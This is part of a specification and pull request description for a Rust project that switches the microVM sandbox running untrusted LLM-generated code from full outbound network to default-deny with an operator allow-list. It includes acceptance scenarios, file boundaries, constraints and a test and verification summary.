+  stale "historical full outbound" prose in
+  `crates/app/src/tools/run_code.rs` and the fusion module docs in
+  `crates/app/src/sandbox.rs`.
+
+## Boundaries
+
+### Allowed Changes
+- crates/app/src/sandbox.rs
+- **/crates/app/src/sandbox.rs
+- crates/app/src/lib.rs
+- **/crates/app/src/lib.rs
+- crates/app/src/tools/run_code.rs
+- **/crates/app/src/tools/run_code.rs
+- crates/app/src/tools/AGENT.md
+- **/crates/app/src/tools/AGENT.md
+- crates/rara-sandbox/src/config.rs
+- **/crates/rara-sandbox/src/config.rs
+- crates/rara-sandbox/AGENT.md
+- **/crates/rara-sandbox/AGENT.md
+- config.example.yaml
+- **/config.example.yaml
+- specs/issue-2216-run-code-default-deny-egress.spec.md
+- **/specs/issue-2216-run-code-default-deny-egress.spec.md
+
+### Forbidden
+- crates/app/src/tools/bash.rs
+- crates/rara-sandbox/src/sandbox.rs
+- crates/rara-sandbox/src/lib.rs
+- crates/kernel/**
+- crates/rara-fleet/**
+- crates/rara-model/**
+- web/**
+- extension/**
+- .github/workflows/**
+
+## Acceptance Criteria
+
+Scenario: sandbox configured with no allow-list yields no network (default-deny)
+  Given a `SandboxToolConfig` with `default_rootfs_image` set,
+    `bash = None`, and `run_code = None`
+  When `fused_network_policy(&config)` is computed
+  Then the result is `NetworkPolicy::Disabled`
+  And this inverts the pre-change behavior, where the same input
+    returned `Enabled { allow_net: [] }` (full outbound)
+  Test:
+    Package: rara-app
+    Filter: no_config_yields_disabled_network
+
+Scenario: empty run_code allow-list is treated as deny
+  Given a `SandboxToolConfig` with `run_code = Some(RunCodeSandboxConfig
+    { allow_net: [] })` and `bash = None`
+  When `fused_network_policy(&config)` is computed
+  Then the result is `NetworkPolicy::Disabled`
+  Test:
+    Package: rara-app
+    Filter: empty_run_code_allowlist_is_disabled
+
+Scenario: operator's explicit run_code allow-list is honored
+  Given a `SandboxToolConfig` with `run_code = Some(RunCodeSandboxConfig
+    { allow_net: ["pypi.org", "files.pythonhosted.org"] })` and
+    `bash = None`
+  When `fused_network_policy(&config)` is computed
+  Then the result is `NetworkPolicy::Enabled { allow_net }` where
+    `allow_net` contains exactly `pypi.org` and `files.pythonhosted.org`
+    (order not asserted, no duplicates)
+  Test:
+    Package: rara-app
+    Filter: run_code_allowlist_is_honored
+
+Scenario: bash and run_code allow-lists union into one policy
+  Given a `SandboxToolConfig` with `run_code.allow_net = ["pypi.org"]`
+    and `bash.allow_net = ["github.com"]`
+  When `fused_network_policy(&config)` is computed
+  Then the result is `NetworkPolicy::Enabled { allow_net }` whose set
+    equals `{ "pypi.org", "github.com" }` (deduplicated union, both
+    present, neither dropped)
+  Test:
+    Package: rara-app
+    Filter: bash_and_run_code_allowlists_union
+
+Scenario: NetworkPolicy default is safe-by-default (Disabled)
+  Given a `SandboxConfig` built via `SandboxConfig::builder()
+    .rootfs_image("alpine:latest").build()` with `network` omitted
+  When its `network` field is read
+  Then it is `NetworkPolicy::Disabled`
+  And `NetworkPolicy::default()` returns `NetworkPolicy::Disabled`
+  Test:
+    Package: rara-sandbox
+    Filter: network_policy_default_is_disabled
+
+Scenario: no config input can reach the full-outbound sentinel
+  Given a `SandboxToolConfig` with `run_code.allow_net = ["*"]`
+    (a bare wildcard, which boxlite matches to no real host) — and,
+    separately, `run_code.allow_net = ["0.0.0.0/0"]`
+  When `fused_network_policy(&config)` is computed for each
+  Then each result is a **scoped** `NetworkPolicy::Enabled { allow_net }`
+    whose list equals the operator's entries passed through verbatim
+    (`["*"]` and `["0.0.0.0/0"]` respectively — treated as ordinary
+    boxlite host/CIDR patterns, not expanded to "all hosts")
+  And in neither case (nor for any other config input) does the result
+    equal `NetworkPolicy::Enabled { allow_net: [] }` — the empty-list
+    full-outbound sentinel is unreachable from YAML, which is the
+    invariant this issue installs (boxlite v0.9.7 has no "all hosts"
+    token, so full outbound is deliberately not expressible)
+  Test:
+    Package: rara-app
+    Filter: no_config_input_yields_empty_allowlist_enabled
+
+## Constraints
+
+- No Rust-side default values for the new config: `run_code` absence is
+  `Option::None`, not a `Default` impl (project config discipline,
+  `docs/guides/anti-patterns.md` — "no hardcoded config defaults in
+  Rust").
+- `allow_net` is a real operator-facing deployment knob (which hosts the
+  user trusts), NOT a mechanism-tuning constant — it correctly lives in
+  YAML, unlike the ring-buffer/backoff consts the anti-pattern doc keeps
+  out of YAML.
+- Preserve the PR 1946 invariant: no per-call `NetworkPolicy` argument
+  is added back to `sandbox_for_session`; the policy is computed once at
+  VM creation from shared config.
+- The existing `fused_network_policy` unit tests that assert the old
+  "run_code full-net dominates" behavior
+  (`fuses_run_code_full_net_with_disabled_bash`,
+  `fuses_run_code_full_net_dominates_bash_allowlist`,
+  `fuses_empty_bash_allowlist_as_disabled_caller`) MUST be updated to the
+  new semantics, not left asserting the removed behavior. They are the
+  fail-before/pass-after binding for this change.
+- All new/changed comments and identifiers in English.
+
+## Out of Scope
+
+- Packet-level / DNS egress enforcement inside the VM — that is boxlite's
+  responsibility and is exercised only by the `#[ignore]`d integration
+  test; this issue changes the policy the VM is *created with*, not
+  boxlite's enforcement of it.
+- Per-tool separate VMs (giving `run_code` and `bash` different network
+  policies by not sharing a VM) — a larger architecture change to the
+  shared-VM model from PR 1946; not required to achieve default-deny.
+- Any change to `bash`'s existing behavior, the FS/mount boundary, path
+  translation, or the write-class file tools.


### PR DESCRIPTION
## What & Why

`run_code` executes untrusted, LLM-generated code inside a per-session boxlite microVM that had **full outbound network by default**, with no operator config able to turn it off while `run_code` was registered. `fused_network_policy` hardcoded `run_code`'s contribution to `Enabled { allow_net: [] }` (full outbound), which dominated the shared-VM union.

This makes egress **default-deny, operator allow-list only** — the OpenAI Codex / Claude-sandbox baseline.

## Changes

- **`run_code` gets its own config-driven allow-list** — `RunCodeSandboxConfig { allow_net }` on `SandboxToolConfig`, mirroring `BashSandboxConfig` (None/empty ⇒ deny; non-empty ⇒ `Enabled` with that list). No Rust-side default.
- **`fused_network_policy` reads `run_code` from config.** The "empty-list ⇒ full-outbound collapse" branch is **removed**: the union yields `Disabled` when every contributor is empty/absent, and a concrete host/CIDR-scoped `Enabled` otherwise. No config input can reach `Enabled { allow_net: [] }`.
- **`NetworkPolicy::default()` flipped to `Disabled`** (safe-by-default, defense-in-depth; app path always sets `.network()` explicitly).
- Rewrote the "historical full outbound" narrative in `config.example.yaml`, `run_code.rs`, `sandbox.rs`, and both `AGENT.md` files to the default-deny model.

## boxlite wildcard finding (drove the design)

boxlite v0.9.7 has **no "all hosts" wildcard token** (confirmed against its gvproxy-bridge source): `*.example.com` is a subdomain-suffix match only; a bare `*` matches no real host (≡ no network); `0.0.0.0/0` leaves hostnames DNS-sinkholed; the only full-outbound expression is the empty-list sentinel — the footgun this PR deletes. So there is **no full-outbound opt-in**; operators enumerate hosts (subdomain wildcards cover families). This intentionally supersedes PR #1946's conscious choice to model `run_code` as `Enabled { allow_net: [] }` for "historical" full-net — a new, intentional security decision, not a forgotten reversal.

## Invariants preserved

- No per-call `NetworkPolicy` argument re-added to `sandbox_for_session` (PR #1946 review invariant) — policy still computed once at VM creation.
- Rebased onto current `main` (`4da7c2e9`); the only conflict was the test module boundary with #1866's `reclaim_when_idle` tests — both sides' logic kept, my substantive diff unchanged.

## Test plan (lane 1)

`just spec-lifecycle specs/issue-2216-run-code-default-deny-egress.spec.md` — all 6 scenarios + boundaries PASS (zero-match guard OK). Falsifiable binding: the 3 old "run_code full-net dominates" tests were **deleted** and replaced with the default-deny assertions (fail-before / pass-after).

- `cargo test -p rara-app sandbox::tests` → 8 pass (5 new network-policy tests + #1866's 3 reclaim tests).
- `cargo test -p rara-sandbox network_policy_default` → pass.

Packet-level egress enforcement is boxlite's job (exercised only by the `#[ignore]`d integration test); this PR changes the policy the VM is *created with*. No PR-time driver-stack e2e — the change is pure policy computation with unit-test coverage.

## Verification

**Verifier: PASS** (fresh-context, pre-rebase base `b593f581` → head `0854195d`; re-run clean-state quality gate + `just spec-lifecycle` all 6 scenarios PASS + hostile probes on `["*"]`/`["0.0.0.0/0"]`/empty inputs). Post-rebase (`4da7c2e9` → `c2dcf646`) the conflict resolution was trivial (test-module boundary only) and the full test suite re-passes (8/8), so the PASS verdict carries. Report kept inline per the parallel-PR convention (no committed `verification/report.md`).

Closes #2216